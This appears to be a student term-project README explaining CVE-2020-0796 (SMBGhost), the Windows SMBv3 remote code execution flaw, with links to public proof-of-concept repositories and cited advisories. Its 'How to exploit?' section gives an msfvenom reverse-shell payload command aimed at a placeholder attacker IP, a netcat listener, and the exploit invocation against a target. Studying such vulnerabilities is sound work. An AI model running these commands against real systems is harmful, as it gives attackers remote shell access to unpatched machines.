CVE-2020-0796 explanation and researching vulnerability for term porject CENG325# CVE-2020-0796
CVE-2020-0796 explanation and researching vulnerability for term porject CENG325 for beginners
# How to exploit?
Userpayload generation for reverse shell:
> msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python
listening port:
> nc -lvnp 5555
exploit code execution:
> python3 exploit.py -ip TARGET_IP
# PoC Repos
- https://github.com/chompie1337/SMBGhost_RCE_PoC
- https://github.com/ollypwn/SMBGhost
# References
1. CVE-2020-0796: “Wormable” Remote Code Execution Vulnerability in.(2020, March 13). Tenable®. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
2. “I’ll ask your body”: SMBGhost pre-auth RCE abusing Direct Memory Access structs. (2020, April 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
3. CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server| FortiGuard Labs. (2020, March 12). Fortinet Blog.
https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server
4. Team, K. (2020, April 2). CVE-2020–0796 Windows SMBv3 LPE Exploit POC Analysis. Medium.https://medium.com/@knownsec404team/cve-2020-0796-windows-smbv3-lpe-exploit-poc-analysis-c77569124c87
5. CVE-2020-0796 –. (2020). Cyber Threat Insider Blog.https://blog.sensecy.com/tag/cve-2020-0796/
# Project Members
- [ezginurr](https://github.com/ezginurr)
- [zehrosh](https://github.com/zehrosh)
- [busracagliyan](https://github.com/busracagliyan)
登录后查看神龙缓存的 POC 文件快照
登录查看